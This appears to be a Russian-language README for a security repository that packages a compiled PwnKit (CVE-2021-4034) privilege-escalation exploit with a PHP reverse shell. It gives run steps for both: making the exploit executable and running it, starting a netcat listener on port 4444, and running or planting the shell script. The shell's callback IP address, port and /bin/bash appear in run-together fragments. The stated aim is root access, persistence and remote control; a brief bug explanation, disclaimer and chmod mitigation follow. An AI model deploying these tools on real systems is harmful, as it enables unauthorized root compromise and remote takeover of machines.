
Репозиторий для исследований в области безопасности, содержащий доказательство концепции (PoC) для уязвимости CVE-2021-4034 (PwnKit) и скриптовые утилиты для демонстрации повышения привилегий и удаленного выполнения в средах Linux.
⚠️ ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ: Этот репозиторий создан исключительно в образовательных целях и для исследований в области безопасности. Автор не несет ответственности за неправомерное использование этих инструментов. Используйте только в контролируемых средах или там, где у вас есть явное разрешение.
Этот репозиторий содержит скомпилированную концепцию (PoC) для уязвимости PwnKit (CVE-2021-4034) — критической ошибки локального повышения привилегий в компоненте pkexec пакета Polkit.
Кроме того, включен скрипт Reverse Shell на PHP, готовый к развертыванию после эксплуатации или в качестве вектора начального доступа.
Получить доступ root на уязвимых системах Linux и установить постоянство или удаленное управление через обратную оболочку.
PwnKit (ELF Binary)Скомпилированный эксплойт для CVE-2021-4034.
pkexec для загрузки вредоносной общей библиотеки и выполнения кода с правами root.pkexec на целевой системе.reverseShell.phpЛегковесная нагрузка для установления обратного соединения.
192.168.1.84444/bin/bashphp reverseShell.php) или внедрена на уязвимый веб-сервер.PwnKit на целевую систему.chmod +x PwnKit
./PwnKit
nc -lvnp 4444
reverseShell.php, если ваш IP-адрес отличается от заданного по умолчанию.php reverseShell.php
Эта уязвимость заключается в том, как pkexec обрабатывает аргументы командной строки. При передаче пустого списка аргументов pkexec пытается обратиться к argv[1] за пределами границы, что позволяет атакующему перезаписать переменные окружения в памяти, в частности, внедрить вредоносную переменную GCONV_PATH для перехвата потока выполнения.
Для защиты от этого эксплойта:
chmod 0755 /usr/bin/pkexec
Happy Hacking! 🏴☠️